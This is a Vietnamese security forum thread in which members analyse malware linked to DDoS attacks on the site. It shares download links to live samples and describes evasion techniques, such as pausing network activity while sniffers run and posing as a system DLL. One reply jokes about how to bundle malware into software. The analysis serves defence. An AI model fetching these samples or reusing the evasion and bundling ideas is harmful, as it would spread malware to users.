Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc wrote:
@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino 
Tui đăng ký nick lâu lắm rồi nhưng chả dám thảo luận vì tự nghĩ mình trình còi. Tuy không thảo luận, tui vẫn vào diễn đàn rất thường xuyên để đọc và học hỏi. Lần này tui đọc phản hồi của bạn thiên thần pê cê, tui thấy ngứa mắt chịu không nổi nên mới đánh bạo làm vài dòng cảm nghĩ. Một thằng vô danh tiểu tốt cù bất cù bơ như tui bây giờ có công ăn việc làm, có khả năng suy nghĩ và nhận xét, trở thành một thằng người hẳn hòi là nhờ anh conmale. Anh conmale chưa bao giờ trực tiếp chỉ dạy tui một cái gì hết nhưng tui học được từ anh ấy vô vàn thứ từ hồi 2004 đến nay. Không chỉ lĩnh vực kỹ thuật mà còn lĩnh vực tư duy và đời sống, anh conmale làm cho tui ngộ ra nhiều điều và gián tiếp truyền cho tui sức mạnh để vượt qua bao nhiêu là khó khăn trong bao nhiêu năm trời. Nếu đúng anh conmale đang "chầm chậm đưa những tư tưởng chính trị, quan điểm" của anh ấy vào đây thì tui thấy đây là chuyện đáng mừng bởi vì những tư tưởng chính trị và quan điểm của anh ấy chả làm cho một thẳng cù bơ cù bất như tui không tệ hại hơn mà ngược lại làm cho tui trở thành con người tốt hơn và hữu ích cho xã hội hơn. Tui thấy tội nghiệp bạn thiên thần pê cê vì bạn vẫn nằm trong một cái hộp mà không biết. Không đủ sức hoặc không muốn bước ra khỏi cái hộp. Hãy bước ra khỏi cái hộp đi bạn à. Có những thứ còn cao hơn và rộng hơn cả những cái "lề" mà bạn đang biết. PS: tui nói thật là tui dùng t0r để đăng nhập HVA vì sau vụ STL này, gió tanh quá, mưa nhiều máu quá.]]>
/hvaonline/posts/list/39641.html#247585 /hvaonline/posts/list/39641.html#247585 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?259kv56xit09c6b, password: infected, nằm chung trong thư mục này: http://www.mediafire.com/?tz745o0f678w8 Bà con xem trong file đó, có file nào tồn tại trên máy mình, xoá ngay lập tức giùm em cái, không thì mai mốt đụng tới tụi nó, tụi nó search trong HTTP server xxx của nó, tìm thông tin của bà con rồi public ra là mệt đấy (Chửi sao đây ha !). Các file .idb là các file IDA 6.1 database, chưa hoàn chỉnh lắm. Bà con nào có IDA 61 có thể mở file .idb đó lên và xem cách thức hoạt động của chúng !]]> /hvaonline/posts/list/39641.html#247597 /hvaonline/posts/list/39641.html#247597 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247603 /hvaonline/posts/list/39641.html#247603 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://technet.microsoft.com/en-us/sysinternals/bb963902, tìm GoogleCrashHander.exe ở đâu, right click, xoá đi. 4. Up mẫu GoogleCrashHandler.exe đó lên đâu đó cho anh em RE team của HVA phân tích. Up xong rồi xoá nó đi. 5. Xong, cho một con bot nữa của stl đi die cho rồi, thử xem thằng coder "mèo què" với thằng RCE, up mẫu cho AV, thằng nào nhanh hơn, hiệu quả hơn, thằng đó thắng ! Nhắc với anh em stl coder, đã pure C, pure API thì pure cho trót, đừng có lượm lặt đâu trên Internet, thấy có vài hàm dùng được, nhưng lại có dùng CString, thì đừng có cố mà mang vào. Em RCE mà thấy ngớ ngẫn lắm, vì khi mấy anh dùng tới CString, thì anh phải mang theo ít nhất 2,3 chục hàm internal của CString, của MFC, ATL. Bà con cứ open mấy file .idb trong QTTask.zip của em ra sẽ thấy, các hàm CString chỉ dùng cho duy nhất trong 1 hàm nào đó của mấy anh coder stl tự code. Code vậy thì hơi bị ngớ ngẫn đấy ! Ví dụ hàm EnsureDirs trong file .idb nào đó, hay hàm compare Process Name = Upper case của mấy anh stl, không không đang đi cao tốc lại rẽ đi vào đường quốc lộ, đường nông thôn. Làm em RCE cũng mệt đứ đừ, cứ tự hỏi, quái, làm cái gì vầy trời, có khùng không trời ! Em viết ra như trên thì chắc sẽ có nhiều người không đồng ý với em, cho là em tự cao tự đại, kiêu ngạo gì đó, vân vân và vân vân... ! Em không phải vậy, phân tích ra vậy, nói ra vậy để mọi người hiểu, về phương diện code, coder, stl cũng chỉ là những thằng bình thường, chỉ là nhưng newbie hay immediate level thôi, chả phải là thần thánh, hung thần gì cả, không có gì mà phải sợ tụi nó, và tụi này, từng thành viên cũng bình thường về trình độ như chúng ta thôi, chả giỏi hơn cái gì cả, chả phải "du côn học sinh" về giỏi hơn chúng ta ! Về phương diện kỹ thuật, tụi này cũng "phình phường" thôi, mọi người có kinh nghiệm RCE, VC++ coding một chút sẽ hiểu được code của tụi nó, hiểu được tụi nó nghỉ gì, muốn gì khi code con "mèo què" đó ! Điểm thứ hai, hầu hết mèo què của stl, dòng nào theo dòng đó (nằm vùng, ăn cắp thông tin, downloader, bot..), chỉ có một base code (code gốc) duy nhất theo dòng đó, khác nhau duy nhất chỉ là mấy cái string hardcode, encrypt, mấy cái thuật toán mã hoá, giãi mã khác nhau, mấy cái URL khác nhau thôi. Còn lại thì như anh chị em sinh đôi hết. Em nói đúng không mấy anh stl ? Mấy anh gần cạn hết mẫu rồi mà, phải không ? Chúng ta đang làm đúng, danh chánh ngôn thuận, đang đấu tranh với tệ nạn xã hội, tội phạm xã hội, tội phạm dùng công nghệ cao "hơi hơi", chả có gì phải sợ, phải giấu mặt với chúng hết ! Nếu chúng ta sợ hãi, chúng ta giấu mặt khi nói tới tụi nó, vô tình chúng ta làm chúng nghĩ rằng ai cũng sợ tụi nó, sợ thế lực đứng sau lưng tụi nó ! Sau này chúng sẽ càng hoành hoành, tác oai, tác quái, khống chế hết mọi thứ ! Lúc đó, tự do cá nhân, tự do IT, tự do Internet, tự do phát ngôn, tự do tìm hiểu thông tin mà Hiến Pháp VN ta quy định có còn không ? PS: Ngày hôm nay chạy cái xe cùi gần 100 km, về nhà, mệt đứ đừ, đọc mấy cái post thấy bức xúc quá !]]> /hvaonline/posts/list/39641.html#247604 /hvaonline/posts/list/39641.html#247604 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247606 /hvaonline/posts/list/39641.html#247606 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247607 /hvaonline/posts/list/39641.html#247607 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247608 /hvaonline/posts/list/39641.html#247608 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247610 /hvaonline/posts/list/39641.html#247610 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247611 /hvaonline/posts/list/39641.html#247611 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://www.mediafire.com/?qmzxr23aaa9ofi7
]]>
/hvaonline/posts/list/39641.html#247612 /hvaonline/posts/list/39641.html#247612 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247623 /hvaonline/posts/list/39641.html#247623 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247630 /hvaonline/posts/list/39641.html#247630 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://www.mediafire.com/?86gmzq22wztpzzv
------------- PS: anh N sẵn tiện đây cho em hỏi là anh dùng tool gì để Decompiler C và C++ vậy ?. Em đang có mấy cái file C++ muốn phân tích. Tìm trên google nhưng tool đa số không được tốt cho lắm. Anh chỉ cần nói tên thôi em sẽ tự tìm. Cảm ơn anh!]]>
/hvaonline/posts/list/39641.html#247632 /hvaonline/posts/list/39641.html#247632 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247639 /hvaonline/posts/list/39641.html#247639 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247640 /hvaonline/posts/list/39641.html#247640 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Buồn một chút là không nhắc gì tới HVA cả, nếu không có HVA thì mấy ai biết được ITunesHelper và GoogleCrashHandler. Tuy nhiên, vẫn có CMC trong list các đơn vị hổ trợ. Và chia buồn với mấy sứ giả cãi thiện chiến của BKAV, BKIS là không có tên của mấy anh trong đó ! Hoan hô Bolzano của CMC ! Công sức của anh em HVA ta, tuy không và chưa được ai công nhận, nhưng đã đến lúc thu được kết quả rồi. Giống như những nhà từ thiện chân chính, cần gì báo đài tung hô, chỉ cần mình làm đúng, hết lòng vì việc mình làm, phải không các bạn ? Còn phần em thì vẫn tiếp tục chờ và tìm mẫu giấu mặt khác đang DDOS VNN, vẫn tiếp tục RCE, phân tích và công bố các mẫu khác của stl. Không ai cấm em được việc em đang làm ! Mong mọi người tiếp tục ủng hộ, tham gia, mạnh dạn vạch trần, đánh sập tụi stl xấu xa, giấu mặt, dơ bẩn, hèn hạ này ! Tự dưng em tự hỏi, nếu lần này, chúng ta, HVA, cộng đồng IT VN ta, phải thua tụi nó giữa chừng, thì mai mốt, vô hình, không có nước nào trên thế giới giống VN ta, có một thế lực hắc ám, "tử thần thực tử" cho kẻ mà "ai cũng biết là ai đó" lơ lững trên đầu mình, sẵn sàng dập mình, đập chết mình, bóp nghẹt, đàn áp, khống chế, đe doạ mình ! Các bạn chịu được không ????????????????? Tự hỏi chính lương tâm các bạn đi ! Xã hội bây giờ là xã hội dân chủ, tự do thông tin, tự do chính kiến rồi, các bạn à ! 1. Việc chúng ta đang làm, đấu tranh với stl có phạm pháp không các bạn ? Hoàn toàn không ! 2. Chúng ta có chống phá chế độ, nhà nước không các bạn ? Hoàn toàn không ! 3. Chúng ta có xúc phạm, đả kích một công dân chân chính VN nào không các bạn ? Hoàn toàn không ! 4. Chúng ta làm việc này, có thu lợi, mang lại đồng tiền, lợi ích cho cá nhân không các bạn ? Hoàn toàn không ! 5. Chúng ta đang đấu tranh với tội phạm mạng, tội phạm xã hội phải không các bạn ? Hoàn toàn đúng ! 6. Chúng ta tham gia đấu tranh với stl để bảo vệ chính mình, bảo vệ mọi người, bạn bè, thân thuộc..., đúng không các bạn ? Hoàn toàn đúng ! .... Còn nhiều cái khác nữa, mong các bạn hãy dũng cảm đứng lên, cùng tham gia góp sức để đập tan tụi stl này ! Tà không bao giờ thắng chính được, các bạn à !  
Chắc anh lại uống quá chén rùi ;) Bình tĩnh anh ơi, để có sức mà dập tắt nạn stl chứ :)) Mọi người vẫn ủng hộ việc làm của các anh mà :D Sau khi xong cái đám tạp nham đó thì có khối người mời anh đi nhậu ý :D lúc đó có uống nổi không :)]]>
/hvaonline/posts/list/39641.html#247641 /hvaonline/posts/list/39641.html#247641 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Nhìn vào hình này, các bạn cũng thấy, stl coder code chỉ 6 hàm, còn DllMain là prototype bắt buộc của DLL, vậy mà chỉ vì vài hàm trong 6 hàm đó dùng CString, mà stl coder đã mang vào chương trình một đống các hàm (gần 30 hàm) của các class ATL::CString, ATL::CSimpleString, ATL::CWin32Heap, ATL::CAtlStringMgr, và một đống các hàm khác của STL - C++ Standard Template Library , cũng vì lai giữa C và C++, dùng lẫn lộn giữa new và malloc mà phải chịu vậy ! Trên hình, đoạn màu xanh nhạt là C/C++ library function, đoạn màu xanh đậm là code của stl coder. Nói phải có bằng có chứng, chứ không mấy anh stl coder nói em nói mò, phán bậy ! Em nói đúng không mấy anh stl, xem lại code của rdpuser.mof đi ! Sợ mấy anh không nhớ rdpuser.mof là gì, em xin nhắc luôn, tên gốc lúc build của nó là advapi32.dl (mạo danh advapi32.dll, core dll của MS), build vào ngày 22/11/2010 đó ! ]]>
/hvaonline/posts/list/39641.html#247642 /hvaonline/posts/list/39641.html#247642 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl wrote:

bolzano_1989 wrote:
mainguyendl có thể gửi 2 file sau lên để mọi người kiểm tra thêm: c:\program files\unikey v408\unikey.exe c:\program files\internet download manager\idman.exe  
bạn đang nói mình ha? hay mainguyendl? nếu nói mình thì tối đi làm về mình se up lên mediafire cho bạn, thank bạn nhiều!! 
nhầm tên đó mà :D]]>
/hvaonline/posts/list/39641.html#247643 /hvaonline/posts/list/39641.html#247643 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong wrote:

TQN wrote:
Mình chỉ nhắc mấy anh em sv FPT đó là được rồi, bolzano. Mấy em sv FPT đó chịu khó remove cái Form3 ra giùm đi. Kiếm tiền thì nên quang minh chánh đại chứ, đừng làm những hành động vậy. Đã có ý tưởng tốt, viết phần mềm free thì free cho trót ! Em nhớ hồi xưa ông thầy dạy Anh Văn hồi PT của em có chế một câu: "Nhân bất học bất chi lý, trẻ không học lớn lên chích ma tuý, mình có học lớn lên làm đại uý" ;) Đùa một chút cho mọi anh em bớt căng thẳng.  
Thấy cu "thắng" học FPT tranh luận bên 4rum của cmc là do website bị "hacker" hack vào nên chèn trojan vào bản cài mà anh. Nhưng hình như là mấy cái Form3 này như anh nói là do chương trình của cu cậu bật lên để auto click. chứ không phải là do file exe nào của thằng "hacker" vì chắc chả thằng nào hâm lại đi resource cái toitietkiem.vn ra để lấy source rồi lại code lại thêm mấy cái Form3 -> build lại -> lại up lên server của toitietkiem.vn. Thường thì sẽ Binder cái malware vào :D. kinh nghiệm code phần mềm chứa mã độc là nên Binder mã độc vào chứ đừng code chèn vào phần mềm =)) để lúc bị phát hiện còn dễ cãi =)). tốt nhất là link download phần mềm từ trang chủ nên die =)) để cho người ta download phần mềm từ các diễn đàn khác ;)) mấy em nó mới vào đời, chưa có kinh nghiệm mấy vụ này. zzz Em nói sai chỗ nào mong anh em chỉ bảo hộ :D  
Chủ dự án ToiTietKiem.Vn Phạm Ngọc Thắng đã chính thức lên tiếng nhận lỗi ở diễn đàn CMCLab Support của CMC InfoSec trước cộng đồng người dùng về vụ việc phần mềm Toitietkiem.vn Professional được cài trojan: Mọi người có thể đọc chi tiết ở địa chỉ sau: Toitietkiem.vn Professional – Tiết kiệm điện tối ưu cho máy tính http://support.cmclab.net/vn/ung-dung-tien-ich/toitietkiem-vn-professional-tiet-kiem-dien-toi-uu-cho-may-tinh/

ngocthang wrote:
Chào các bạn, Sau ít ngày điều tra thì cuối cùng nhóm cũng tìm ra thủ phạm và xin được chính thức trả lời như sau: Thật đáng xấu hổ khi "hacker" đã gây ra vụ việc lần này lại chính là 1 thành viên trong nhóm phát triển ToiTietKiem. Vì 1 số lí do tế nhị và "hacker" này đã quá xấu hổ trước hành vi của mình nên tôi xin phép đc giấu tên tuổi, danh tính. Thay mặt cho nhóm phát triển, tôi với tư cách là chủ dự án, đồng thời là trưởng nhóm, dù ko trực tiếp thực hiện nhưng cũng xin NHẬN LỖI TRƯỚC CỘNG ĐỒNG VỀ VỤ VIỆC CÀI TROJAN VÀO PHẦN MỀM TOITIETKIEM lần này. Nay bản sạch virus đã được public trở lại, mong nhận được SỰ THA THỨ VÀ TIẾP TỤC ỦNG HỘ từ phía người dùng. Toàn bộ vụ việc được tóm gọn như sau: - Vào khoảng cuối tháng 6, đầu tháng 7, khi các event của ToiTietKiem đc tổ chức sôi động nhất ở các trường ĐH lớn tại HN thì lượng người dùng ToiTietKiem tăng vọt, đạt khoảng 350.000 lượt dùng lúc đó. 1 thành viên trong nhóm thấy cái lợi thu được từ cộng đồng khá đông đảo này nên đã bí mật chèn code trojan vào ToiTietKiem và cho phát tán. Về cơ bản, trojan này chỉ là 1 trình duyệt mini, tự động click quảng cáo để thu lợi nên ko gây hại gì cho máy người dùng. Người dùng cài đặt ToiTietKiem từ 1/7/2011 đến nay, chỉ cần gỡ bản cũ ra và cài lại bản sạch là có thể tiếp tục sử dụng. Người dùng cài trước 1/7/2011 thì không cần phải lo lắng. - Các chứng cứ tiếp theo như mất acc FTP... chỉ là do thành viên này dựng lên để đánh lừa hướng điều tra và tạo bằng chứng vô can cho mình. Dưới đây là ảnh thành viên này đã thu được số tiền từ trojan click quảng cáo "lậu" do linkbucks trả, 5,29$, 1 cái giá quá rẻ mạt cho tiếng tăm mà ToiTietKiem xây dựng gần 2 năm trời.
Để xảy ra vụ việc đáng tiếc lần này, người đáng trách nhất chính là TÔI. Dù ko trực tiếp gây ra, nhưng với tư cách là chủ dự án đồng thời là trưởng nhóm phát triển, tôi xin nhận 100% trách nhiệm về mình. Xin được gửi lời xin lỗi chân thành nhất đến cộng đồng người sử dụng, xin lỗi vì đã làm ảnh hưởng đến uy tín của trường, của nhà tài trợ. Đồng thời, thành viên này cũng chính thức bị sa thải ra khỏi nhóm vì hành vi đạo đức ko thể chấp nhận được của mình. Cảm ơn những người anh em ở CMCLAB và HVA Online đã kịp thời phát hiện và cảnh báo virus. Sau bài học đắt giá này, tôi xin được khắc cốt ghi tâm những kinh nghiệm xương máu. Cam kết ko bao giờ để xảy ra tình trạng tương tự, đặc biệt xem xét lại từ khâu phát triển phần mềm đến khâu phân phối sản phẩm ra thị trường. Sau cùng, xin gửi lại các bạn link download bản ToiTietKiem sạch 100% : http://www.mediafire.com/?tq7n9t664fsxs28 Một lần nữa, xin lỗi vì tất cả, mong được tha thứ và tiếp tục giang tay đón nhận từ phía cộng đồng! Trân trọng cảm ơn,  
]]>
/hvaonline/posts/list/39641.html#247646 /hvaonline/posts/list/39641.html#247646 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?y68d1cgi07y794a  ]]> /hvaonline/posts/list/39641.html#247662 /hvaonline/posts/list/39641.html#247662 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc wrote:
Nhờ anh TQN khám dùm mấy em này
http://www.mediafire.com/?y68d1cgi07y794a 
 
Mấy con này đã có từ lâu lắm rồi. Mấy con này có nguồn từ TQ.]]>
/hvaonline/posts/list/39641.html#247667 /hvaonline/posts/list/39641.html#247667 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Những ai không rành về malware và không có sự bảo vệ cần thiết trên máy của mình mà tò mò download những "mẫu mã" đăng trong chủ đề này về thì hoàn toàn tự chịu trách nhiệm. HVA không chịu trách nhiệm cho quyết định "tò mò" của các bạn.]]> /hvaonline/posts/list/39641.html#247670 /hvaonline/posts/list/39641.html#247670 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.


Thằng làm nhiệm vụ như StaticCaches.dat hồi xưa là thằng \Protect\History.db. Còn thằng cversions2.db thì như dao360.dll.mui hồi xưa, đứng giữa điều phối các file mèo què kia, up thông tin của victim, download new mèo què, bot.... Sau khi kiểm tra có 1 trong 2 file trên, rdpuser.mof sẽ LoadLibraryW 1 trong 2 file đó lên. Bị "bạch hoá" bắt đầu từ đây, phải không mấy anh stl:
Lúc trước, có người hỏi tui, ông biết nhiều vậy, bộ ông không bao giờ viết virus, hack hiếc, tham gia UG à. Em cười lớn, nếu vậy thì mấy ông làm chìa khoá ngồi ở lề đường, mấy thằng sửa xe ngoài Bùi Hửu Nghĩa, Nguyễn Chí Thanh, chợ Tân Thành chắc bị CA chụp cổ hết rồi quá ! Phải không các bạn ? Nếu các bạn nào thích nghiên cứu về malware, RCE, cversions.2.db là một target xứng đáng để các bạn phân tích, có rất nhiều kỹ thuật hay trong đó. Nó với dao360.dll.mui hồi xưa là 1, cùng 1 code base, chỉ modify "sơ sơ" thôi. Không đủ để "her ríc tíc" (tự dưng quên mất tiêu) gì đó của AV không phát hiện ra ! Mấy anh stl coder giỏi quá, tự code hay tìm ở đâu vậy ? Cho em đi làm "đệ tử" với -:|- ]]>
/hvaonline/posts/list/39641.html#247671 /hvaonline/posts/list/39641.html#247671 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247682 /hvaonline/posts/list/39641.html#247682 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247686 /hvaonline/posts/list/39641.html#247686 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247689 /hvaonline/posts/list/39641.html#247689 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247692 /hvaonline/posts/list/39641.html#247692 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247694 /hvaonline/posts/list/39641.html#247694 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247704 /hvaonline/posts/list/39641.html#247704 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 wrote:
Trên VNN có bài nói về vụ DDos này và chuyên gia của Bkav khuyên mọi người nên cài 1 phần mềm diệt virus của Việt Nam thì sẽ cập nhật virus nhanh hơn, nói thì như vậy nhưng thực tế em đã test bản Bkav Internet security pro (16/9/2011) quét tất cả những file chứa malware mà anh TQN đã public gần cả tháng nay mà nó chẳng nhận dạng được virus nữa nói chi tới việc diệt. Không hiểu cái phần mềm "hàng đầu" thế giới này làm gì nữa (nhân viên kỹ thuật của Bkav có thật sự quan tâm đến đám virus này không ? hay họ không biết phải lấy mẫu ở đâu, hay họ quá tự hào về cái gọi là "điện toán đám mây" ?) Ai đang dùng Bkav hãy test thử coi có đúng như vậy không nhé (bà con cập nhật dữ liệu mới nhất thử xem có diệt được không ?). KIS thì đã nhận dạng và diệt sạch.  
Chuyên gia đấy bên CMC không phải của BKIS, cũng không nên anti BKIS quá như vậy bro à]]>
/hvaonline/posts/list/39641.html#247705 /hvaonline/posts/list/39641.html#247705 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Chuyên gia đấy bên CMC không phải của BKIS  Cảm ơn bạn đã đính chính thông tin này. 1.Nhưng mình nói là dựa theo thực tế và mình đã test chứ không nói bừa. 2.Mình không có lý do gì để anti Bkav cả, là người Việt mình ủng hộ phần mềm Việt chỉ có điều sự thật nó khác với lời nói mà thôi. Bạn có thể tin tưởng nhưng hãy tin tưởng vào cái mà bạn "nhận được" khi dùng Bkav. Mình xin hỏi bạn là đã test hay chưa ? ]]> /hvaonline/posts/list/39641.html#247707 /hvaonline/posts/list/39641.html#247707 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 wrote:
Chuyên gia đấy bên CMC không phải của BKIS 
Cảm ơn bạn đã đính chính thông tin này. 1.Nhưng mình nói là dựa theo thực tế và mình đã test chứ không nói bừa. 2.Mình không có lý do gì để anti Bkav cả, là người Việt mình ủng hộ phần mềm Việt chỉ có điều sự thật nó khác với lời nói mà thôi. Bạn có thể tin tưởng nhưng hãy tin tưởng vào cái mà bạn "nhận được" khi dùng Bkav. Mình xin hỏi bạn là đã test hay chưa ?  
1 - Bạn là người đã test BKAV rồi thì thay vì chỉ trích hãy gửi ý kiến về những vấn đề của BKAV mà theo bạn là chưa làm được tới bộ phận chăm sóc khách hàng hay bộ phận kỹ thuật của BKIS như vậy mới là ủng hộ sản phẩm của người Việt 2 - Mình là end-user chứ không phải là Tester nên không rảnh để test 1 sản phẩm nào đó mà mình không có nhu cầu sử dụng. ]]>
/hvaonline/posts/list/39641.html#247715 /hvaonline/posts/list/39641.html#247715 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247722 /hvaonline/posts/list/39641.html#247722 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Kinh nghiệm mới khi RCE malware của stl mà tui vừa phát hiện ra: 1. Luôn Ctrl-S liên tục. 2. Đừng ôm con nhỏ trong lòng khi đang mở malware với OllyDbg hay IDA, nó cứ chòi chòi, đòi gõ bàn phím hoài, F5 hay F9 một cái là tiêu em ;) Mà không cho là nó la mới mệt chứ ! 
Chưa gì bác TQN đã lo huấn luyện thế hệ kế thừa :-) ]]>
/hvaonline/posts/list/39641.html#247724 /hvaonline/posts/list/39641.html#247724 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247725 /hvaonline/posts/list/39641.html#247725 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247727 /hvaonline/posts/list/39641.html#247727 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Trong list trên lại không có TCPView, CurrPorts (cũng của Nirosoft). Các packet monitor tool trên máy em đang có: netcap của Windows Support Tools, CommView, MS Network Monitor, Cain&Abel, và NetworkMiner http://www.netresec.com/?page=NetworkMiner. Em kết nhất là cái NetworkMiner này, opensource, gọn nhẹ, portable. Thử xem mấy anh stl có add code detect hết nổi không ?]]>
/hvaonline/posts/list/39641.html#247730 /hvaonline/posts/list/39641.html#247730 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247736 /hvaonline/posts/list/39641.html#247736 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247739 /hvaonline/posts/list/39641.html#247739 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Các thread khác làm làm nhiệm vụ upload victim infos và download sẽ liên tục check cờ này, nếu thấy not safe, nó sẽ không connect tới các HTTP server định sẵn, thay vào đó các thread sẽ đi ngủ (Sleep) ;) Vì vậy, user bình thường, khi bật Wireshark, Smsniff... lên sẽ không thấy các connection vào ra từ cversions.2.db này. Khi tắt đi thì cversions.2.db sẽ lại connect. stl coder thâm vậy đó, bà con sợ chưa =)) ]]>
/hvaonline/posts/list/39641.html#247740 /hvaonline/posts/list/39641.html#247740 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hì hì, không phải nó kill các tool đó hay exit đâu bà con ! Thâm hơn nữa kìa, nó sẽ đi ngủ, chừng nào tụi kia đi hết nó mới thức dậy và phang tiếp :-( cversions.2.db sinh rất nhiều thread, mổi thread làm nhiệm vụ khác nhau. Code detect các tool sniffer được đặt nằm trong 1 thread. Thread này gần như loop vô tận, và liên tục detect các snifffer. Nếu detect thấy, nó sẽ set 1 cờ, em gọi là g_dwNotSafeToConnect. Các thread khác làm làm nhiệm vụ upload victim infos và download sẽ liên tục check cờ này, nếu thấy not safe, nó sẽ không connect tới các HTTP server định sẵn, thay vào đó các thread sẽ đi ngủ (Sleep) ;) Vì vậy, user bình thường, khi bật Wireshark, Smsniff... lên sẽ không thấy các connection vào ra từ cversions.2.db này. Khi tắt đi thì cversions.2.db sẽ lại connect. stl coder thâm vậy đó, bà con sợ chưa =))  
Ha ha, vậy thì bà con chỉ cần cài 1 cái Wireshark và cứ khởi động Wireshark trên máy thì coi như là stl malware sẽ... ngủ triền miên? =)). Kiểu này BKIS bị ế =)) .]]>
/hvaonline/posts/list/39641.html#247741 /hvaonline/posts/list/39641.html#247741 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247742 /hvaonline/posts/list/39641.html#247742 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247744 /hvaonline/posts/list/39641.html#247744 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. khôn" để biết khi nào các process của các Anti chạy mà Sleep và ngược lại thì sao nhỉ, đang chờ đợi và theo " sỏi" Anh TQN ]]> /hvaonline/posts/list/39641.html#247748 /hvaonline/posts/list/39641.html#247748 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247751 /hvaonline/posts/list/39641.html#247751 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247758 /hvaonline/posts/list/39641.html#247758 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247760 /hvaonline/posts/list/39641.html#247760 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

soida wrote:
Vậy, mình chạy malware trong 1 máy ảo, ngoài máy thật bật chương trình Wireshake thì nó có phát hiện được không nhỉ 

TQN wrote:
Dĩ nhiên là không, vì ToolHelp32 API chỉ detect trên 1 session (có nhiều session trong 1 máy), và máy thật khác máy ảo. 
Hai bác định vẽ đường cho hươu chạy sao ;) vì hình như cũng có cái gọi là VMware detection...lúc đó bọn STL lại thêm 1 đoạn code check nếu là VM thì "chém vè" tiếp...keke]]>
/hvaonline/posts/list/39641.html#247762 /hvaonline/posts/list/39641.html#247762 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Theo hình trên, tại 004016D3, em cứ để mấy anh stl múa sao thì múa, em chỉ cần set result về 0 là "xong phim", bao nhiêu công sức code của mấy anh đổ sông đổ biển hết -:-)

